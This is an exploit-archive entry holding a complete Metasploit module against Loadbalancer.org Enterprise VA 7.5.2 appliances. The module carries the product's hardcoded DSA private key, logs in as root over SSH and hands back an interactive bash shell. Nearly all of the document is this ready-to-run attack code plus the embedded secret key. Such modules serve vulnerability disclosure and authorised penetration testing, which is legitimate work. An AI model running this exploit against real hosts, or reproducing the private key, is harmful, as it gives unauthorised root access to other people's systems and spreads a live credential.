Loadbalancer.org Enterprise VA SSH Private Key Exposure

2014-03-19T00:00:00
ID PACKETSTORM:125778
Type packetstorm
Reporter xistence
Modified 2014-03-19T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'net/ssh'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(info, {  
'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure',  
'Description' => %q{  
Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances  
version 7.5.2 that allows passwordless authentication to any other LB Enterprise box.  
Since the key is easily retrievable, an attacker can use it to gain unauthorized remote  
access as root.  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Privileged' => true,  
'Targets' => [ [ "Universal", {} ] ],  
'Payload' =>  
{  
'Compat' => {  
'PayloadType' => 'cmd_interact',  
'ConnectionType' => 'find',  
},  
},  
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module  
'License' => MSF_LICENSE,  
'References' =>  
[  
['URL', 'http://packetstormsecurity.com/files/125754/Loadbalancer.org-Enterprise-VA-7.5.2-Static-SSH-Key.html']  
],  
'DisclosureDate' => "Mar 17 2014",  
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },  
'DefaultTarget' => 0  
}))  
  
register_options(  
[  
# Since we don't include Tcp, we have to register this manually  
Opt::RHOST(),  
Opt::RPORT(22)  
], self.class  
)  
  
register_advanced_options(  
[  
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),  
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])  
]  
)  
  
end  
  
# helper methods that normally come from Tcp  
def rhost  
datastore['RHOST']  
end  
def rport  
datastore['RPORT']  
end  
  
def do_login(user)  
opt_hash = {  
:auth_methods => ['publickey'],  
:msframework => framework,  
:msfmodule => self,  
:port => rport,  
:key_data => [ key_data ],  
:disable_agent => true,  
:config => false,  
:record_auth_info => true,  
:proxies => datastore['Proxies']  
}  
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']  
begin  
ssh_socket = nil  
::Timeout.timeout(datastore['SSH_TIMEOUT']) do  
ssh_socket = Net::SSH.start(rhost, user, opt_hash)  
end  
rescue Rex::ConnectionError, Rex::AddressInUse  
return nil  
rescue Net::SSH::Disconnect, ::EOFError  
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"  
return nil  
rescue ::Timeout::Error  
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"  
return nil  
rescue Net::SSH::AuthenticationFailed  
print_error "#{rhost}:#{rport} SSH - Failed authentication"  
return nil  
rescue Net::SSH::Exception => e  
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"  
return nil  
end  
  
if ssh_socket  
  
# Create a new session from the socket, then dump it.  
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true)  
ssh_socket = nil  
  
return conn  
else  
return nil  
end  
end  
  
def exploit  
conn = do_login("root")  
if conn  
print_good "#{rhost}:#{rport} - Successful login"  
handler(conn.lsock)  
end  
end  
  
def key_data  
<<EOF  
-----BEGIN DSA PRIVATE KEY-----  
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW  
Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd  
yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ  
rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+  
t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW  
cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY  
TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1  
MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl  
2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH  
SzmJVCWFyVuuANR2Bnc=  
-----END DSA PRIVATE KEY-----  
EOF  
end  
  
end  
  
  
`